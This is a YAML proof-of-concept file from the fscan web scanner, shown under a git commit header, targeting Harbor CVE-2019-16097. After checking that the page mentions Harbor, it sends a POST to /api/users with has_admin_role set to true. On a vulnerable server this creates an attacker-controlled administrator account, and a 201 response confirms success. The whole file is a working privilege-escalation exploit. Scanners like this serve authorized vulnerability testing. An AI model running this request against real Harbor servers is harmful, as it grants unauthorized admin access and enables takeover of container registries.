fscan/webscan/pocs/harbor-cve-2019-16097.yml
ZacharyZcR c2b63a57e2 refactor: 修正包命名规范并修复编译问题
- 重命名 Common -> common,WebScan -> webscan,遵循 Go 包命名约定
- 修复模块路径大小写不匹配导致的编译错误
- 清理依赖项,优化 go.mod 文件
- 添加 Docker 测试环境配置文件
- 新增镜像拉取脚本以处理网络超时问题
- 成功编译生成 fscan v2.2.1 可执行文件

该修复解决了 Linux 系统下包名大小写敏感导致的模块解析失败问题。
2025-09-01 22:41:54 +00:00

24 lines
832 B
YAML

name: poc-yaml-harbor-cve-2019-16097
set:
r1: randomInt(5, 10)
r2: randomLowercase(r1)
rules:
- method: GET
path: /
expression: response.body.bcontains(b"Harbor")
- method: POST
path: /api/users
headers:
Content-Type: application/json
body: >-
{"username": "{{r2}}", "has_admin_role": true, "password": "{{r2}}",
"email": "{{r2}}@example.com", "realname": "{{r2}}"}
follow_redirects: false
expression: |
response.status == 201
detail:
author: scanf & Soveless(https://github.com/Soveless) & cc_ci(https://github.com/cc8ci)
links:
- https://unit42.paloaltonetworks.com/critical-vulnerability-in-harbor-enables-privilege-escalation-from-zero-to-admin-cve-2019-16097/
- https://github.com/goharbor/harbor/issues/8951
- https://www.freebuf.com/vuls/214767.html